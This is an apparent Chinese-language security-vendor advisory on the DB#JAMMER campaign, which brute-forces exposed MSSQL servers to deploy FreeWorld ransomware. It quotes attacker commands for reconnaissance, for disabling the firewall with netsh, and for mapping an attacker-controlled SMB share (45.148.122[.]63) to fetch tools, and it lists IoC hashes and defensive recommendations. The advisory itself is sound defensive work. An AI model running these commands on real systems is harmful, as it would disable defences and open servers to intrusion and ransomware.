資安威脅趨勢 - 駭客鎖定微軟SQL Server進行入侵行動

-

                           


駭客鎖定微軟SQL Server進行入侵行動

一、摘要

        資安業者Securonix揭露DB#JAMMER 攻擊活動的一部分威脅參與者正對暴露在外且含有漏洞的微軟MSSQL Server進行暴力破解,其目的是部署名為FreeWorld的勒索軟體。一旦成功存取資料庫系統,便會找出所有資料庫,並偵測環境裡xp_cmdshell功能是否啟用,進而藉此執行Shell命令並進行偵察,以及在伺服器上建立新的使用者帳號windows、adminv$、mediaadmin$,這些帳號全數具備系統管理員(administrators)、遠端桌面連線用戶(remote desktop users)的群組成員身分。另,駭客為讓攻擊順利,也會藉由登錄檔停用系統大部分安全功能,並下達netsh命令停用防火牆。


、存在風險

        攻擊者一旦成功存取資料庫系統,便會找出所有資料庫,並偵測環境裡xp_cmdshell功能是否啟用,進而藉此執行Shell命令並進行偵察,以及在伺服器上建立新的使用者帳號windows、adminv$、mediaadmin$,這些帳號全數具備系統管理員(administrators)、遠端桌面連線用戶(remote desktop users)的群組成員身分。另,駭客為讓攻擊順利,也會藉由登錄檔停用系統大部分安全功能,並下達netsh命令停用防火牆,攻擊者的攻擊流程如下:

  1. Initial Access (TA0001):駭客採用暴力破解攻擊手法,對MSSQL Server進行入侵,一旦取得權限,會離擊隊系統的資料庫進行列舉,特別會透過【SELECT name FROM sys.sql_logins WHERE name IS NOT NULL】此語法取得其他登入憑證。

  2. System Enumeration (TA0007):針對系統層面的列舉,攻擊者採用幾個較簡易的指令,其包含【wmic.exe】、【net.exe】、【ipconfig.exe】,攻擊者一旦確認系統狀態,會立即展開下一階段的入侵行動,包含更改配置,企圖降低系統的防禦。
    • cmd.exe /c wmic os get caption
    • cmd.exe /c wmic os get version
    • cmd.exe /c wmic computersystem get domain
    • cmd.exe /c whoami
    • cmd.exe /c net use
    • ipconfig
    • ver & hostname
    • cmd.exe /c systeminfo
    • cmd.exe /c hostname
    • cmd.exe /c net user

  3. Impair Defenses (T1562):在此階段,駭客會執行多種指令,為的就是要新增/修改帳號,並且修改registry,詳細如下:
    • User Creation (T1136):攻擊者會在受害者系統上建立三組帳號,分別為windows, adminv$, and mediaadmin$,這些帳號皆具備系統管理員(administrators)、遠端桌面連線用戶(remote desktop users)的群組成員身分。另,攻擊者為避免帳號被登出或權限過期,其之採用【net accounts /maxpwage:unlimited】、【net accounts /forcelogoff:no】兩種方式維持帳號權限。

    • Registry Enumeration and Modification (T1112):攻擊者在攻擊期間以及連線控制期間,會傾向於採用遠端桌面通訊協定(RDP)與受害主機連線,其採用之工具為Ngrok。

    • Disable System Firewall (T1562.004):攻擊者會停用防火牆,確保相關程序不會遭到停用或移除,其採用指令為【netsh firewall set opmode disable】。

  4. Establish Persistence (TA0003):此階段,攻擊者為維持權限,會嘗試連線到遠端的SMB Server並透過此連線方式上傳/下載相關工具,其採用指令為【net use V: \\45.148.122[.]63\V /user:sharp [REDACTED PASSWORD]】。在此攻擊階段,攻擊者也會將Ngrok複製到 C:\Windows\System32路徑下並命名為 n.exe,其嘗試透過相關指令建立RDP連線。另,駭客亦會執行檔案【a2.bat】去下載和安裝AnyDesk。

  5. Lateral Movement (TA0008):隨著前面攻擊基礎的建立,攻擊者會開始橫向移動,其嘗試掃描內部主機之3389 Port,其執行之檔案路徑為:

    程式路徑:    【c:\users\windows\desktop\advanced_port_scanner_2.5.3869.exe】。

  6. Credential Dumping (T1003):攻擊者透過路徑【c:\users\windows\desktop\】下的start.bat檔案執行Mimikatz,藉以取得相關機敏資訊。

  • Indicators of compromise:
    • SHA256 (IoC):
      • 8937A510446ED36717BB8180E5E4665C0C5D5BC160046A31B28417C86FB1BA0F
      • 9D576CD022301E7B0C07F8640BDEB55E76FA2EB38F23E4B9E49E2CDBA5F8422D
      • 867143A1C945E7006740422972F670055E83CC0A99B3FA71B14DEABABCA927FE
      • 80BF2731A81C113432F061B397D70CAC72D907C39102513ABE0F2BAE079373E4
      • 75975B0C890F804DAB19F68D7072F8C04C5FE5162D2A4199448FC0E1AD03690B
      • C576F7F55C4C0304B290B15E70A638B037DF15C69577CD6263329C73416E490E
      • 4C83E46A29106AFBAF5279029D102B489D958781764289B61AB5B618A4307405
      • 0A2CFFFB353B1F14DD696F8E86EA453C49FA3EB35F16E87FF13ECDF875206897
      • 74CC7B9F881CA76CA5B7F7D1760E069731C0E438837E66E78AEE0812122CB32D
      • 947AFAA9CD9C97CABD531541107D9C16885C18DF1AD56D97612DDBC628113AB5
      • 95A73B9FDA6A1669E6467DCF3E0D92F964EDE58789C65082E0B75ADF8D774D66
      • A3D865789D2BAE26726B6169C4639161137AEF72044A1C01647C521F09DF2E16
      • E93F3C72A0D605EF0D81E2421CCA19534147DBA0DDED2EE29048B7C2EB11B20A
      • CC54096FB8867FF6A4F5A5C7BB8CC795881375031EED2C93E815EC49DB6F4BFF
      • 68ED5F4B4EABD66190AE39B45FFF0856FBA4B3918B44A6D831A5B9120B48A1E9
      • 42396CE27E22BE8C2F0620EE61611D7F86DFE9543D2F2E2AF3EF5E85613CEE32
      • F9F6C453DA12C8FF16415C9B696C2E7DF95A46E9B07455CD129CE586B954870D
      • 569E3B6EAC58C4E694A000EB534B1F33508A8B5DE8A7AD3749C24727CC878F4D
      • 8937A510446ED36717BB8180E5E4665C0C5D5BC160046A31B28417C86FB1BA0F
      • 2D27F57B4F193A563443ACC7FE0CBF611F4FF0F1171FCBDF16C3ECEF8F9DBEDB
      • 2B68FE68104359E1BC044DB33B4E88B913E4F5BE69DA9FD6E87EA59A50311E6E
      • 11259F77F4E477CD066008FBFC7C31D5BBDC9EF708C4B255791EE380999A725C
      • BD1C3303D13CADF8BBD6200597E9D365EC3C05F1F48052CD47DCD69E77C94378
      • CD5A2EC1A95D754EE5189BFEE6E1F61C76A0A5EE8173DA273E02F24A62FACCFA
      • BEC3F75F638025A5FE3B8D278856FD273999C49AE7543C109205879B59AFC4C3
      • 2AC044936A922455C80E93F76CC3E2CE539FDAB1AF65C0703B57177FEB5326A6
      • FBC9BA3BA7387C38EB9832213B2D87CF5F9FC2BA557E6FDF23556665CA3EF44A
      • 08F827A63228D7BCD0D02DD131C1AE29BC1D9C3619BE67EA99D8A62440BE57AB

    • C2
      • gelsd[.]com
      • 45.148.122[.]63

        建議改善措施:
  1. 檢視防火牆之設定,確保MSSQL無對外開放。
  2. 檢視防火牆之設定,確保外對內連線之權限已有最小化並且有設定僅允許白名單存取相關資料庫。
  3. 檢視MSSQL Server是否已有保持在最新版本,如尚未進行更新或漏洞修補作業,建議安排維護廠商協助更新系統。
  4. 於防火牆阻擋惡意網域/惡意中繼站,藉以避免使用者連線至該網域。
  5. 儘速導入雲智維服務,進行資安威脅情資偵測與聯防,降低企業資安風險。

       情資報告連結:https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/

這個網誌中的熱門文章

漏洞分享 - Fortinet 產品存在多個漏洞

-
圖片
                                                                                                                                                             Fortinet 產品存在多個漏洞 一、 摘要           Fortinet 產品存在多個漏洞,允許遠端攻擊者利用這些漏洞,於目標系統觸發遠端執行任意程式碼及繞過身份驗證。
閱讀完整內容
-->

案例分享-某企業AD上百組帳號大量登入失敗導致鎖定事件

-
圖片
  某企業 AD 上百組帳號大量登入失敗導致鎖定事件   一、案例故事 某企業客戶於某日下午發生 Exchange 遭受外部惡意主機大量進行暴力破解攻擊,導致企業內部環境 AD 伺服器短時間內被鎖定一百多筆帳號事件,而該企業也有在 Exchange 的 WebMail 上啟用雙因子認證,還是在短時間內遭受大量暴力破解攻擊,尋求雲智維科技團隊協助。  
閱讀完整內容
-->

漏洞分享 - Fortinet 產品存在多個漏洞

-
圖片
                                                                                                                                                                     Fortinet 產品存在多個漏洞 一、 摘要           Fortinet 產品存在多個漏洞,允許遠端攻擊者利用這些漏洞,於目標系統觸發跨網站指令碼、繞過身份驗證、敏感資料洩露、遠端執行任意程式碼及資料篡改。
閱讀完整內容
-->

漏洞分享 - Fortinet 產品存在多個漏洞

-
圖片
                                                                                                                                                                                                     Fortinet 產品存在多個漏洞 一、 摘要             Fortinet 產品存在多個漏洞,允許遠端攻擊者利用這些漏洞,於目標系統觸發敏感資料洩露、遠端執行任意程式碼及資料篡改 。
閱讀完整內容
-->

資安威脅趨勢 - 醫院遭CrazyHunter勒索軟體持續攻擊

-
圖片
OO醫院遭CrazyHunter勒索軟體持續攻擊 一、 摘要             2025年2月9日至11日, OO醫院、遭受CrazyHunter勒索軟體攻擊,導致超過600台電腦受影響,掛號系統中斷,影響病患就醫。駭客透過AD主機發動攻擊,利用弱密碼取得權限並進行大範圍加密勒索。 二 、存在風險            此次攻擊事件對OO醫院的急診室與掛號系統已受到影響,雖然醫療作業仍可運行,但若攻擊持續,可能導致更大範圍的醫療業務受影響,甚至影響病患的就醫權益。            雖然目前尚未發現病人個資外洩,但勒索軟體的攻擊特性通常涉及數據加密與竊取,醫療數據可能面臨被竊取、加密或公開的風險。            更值得關注的是,駭客已揚言將於2月11日傍晚進一步發動攻擊,顯示此次攻擊可能具有持續性,甚至擴大至其他醫療機構。 攻擊方式 : 透過Active Directory(AD)主機發送惡意程式 弱密碼 漏洞 攻擊取得帳號權限 部署CrazyHunter勒索軟體進行檔案加密 IOC : av-1m.exe  EE854E9F98D0DF34C34551819889336C16B9BFE76E391356CB17B55D59CF28CF av.exe 3B2081042038C870B1A52C5D5BE965B03B8DD1C2E6D1B56E5EBB7CF3C157138D bb.exe  2CC975FDB21F6DD20775AA52C7B3DB6866C50761E22338B08FFC7F7748B2ACAA crazyhunter.exe F72C03D37DB77E8C6959B293CE81D009BF1C85F7D3BDAA4F873D3241833C146B crazyhunter.sys 5316060745271723C9934047155DAE95A3920CB6343CA08C93531E1C235861BA CrazeHunter.zip D202B3E...
閱讀完整內容
-->

漏洞更新 - VMware修補vCenter Server heap-overflow和privilege escalation漏洞

-
圖片
                                                                                                                                                            VMware修補vCenter Server heap-overflow和privilege escalation漏洞 一、 摘要           VMware於本週二(6/18)修補了位於vCenter Server中的3個安全漏洞,其中的CVE-2024-37079與CVE-2024-37080屬於堆積溢位漏洞,可導致遠端程式攻擊,其CVSS風險評分高達9.8,另一個CVE-2024-37081則是本地端權限擴充漏洞,CVSS風險評分為7.8。
閱讀完整內容
-->

漏洞分享 - Fortinet 產品存在多個漏洞

-
圖片
                                                                                                                                                                                                                            Fortinet 產品存在多個漏洞 一、 摘要           Fortinet 產品存在多個漏洞,允許遠端攻擊者利用這些漏洞,於目標系統觸發遠端執行任意程式碼、洩露敏感資料、繞過身份驗證、篡改及權限提升。
閱讀完整內容
-->

漏洞分享 - Fortinet 產品存在多個漏洞

-
圖片
                                                                                              Fortinet 產品存在多個漏洞 一、 摘要           Fortinet 產品存在多個漏洞,允許遠端攻擊者利用這些漏洞,於目標系統觸發遠端執行任意程式碼及繞過保安限制。
閱讀完整內容
-->

漏洞分享 - Fortinet 產品多個漏洞

-
圖片
                                                                                                                                                                                                                                                                     Fortinet 產品多個漏洞 一、 摘要           Fortinet 產品存在多個漏洞,允許遠端攻...
閱讀完整內容
-->

漏洞分享 - Fortinet 產品存在多個漏洞

-
圖片
                                                                                                                                                                                                                                                               Fortinet 產品存在多個漏洞 一、 摘要           Fortinet 產品存在多個漏洞,允許遠端攻擊者利用這些漏洞,於目標系統觸發遠端執...
閱讀完整內容
-->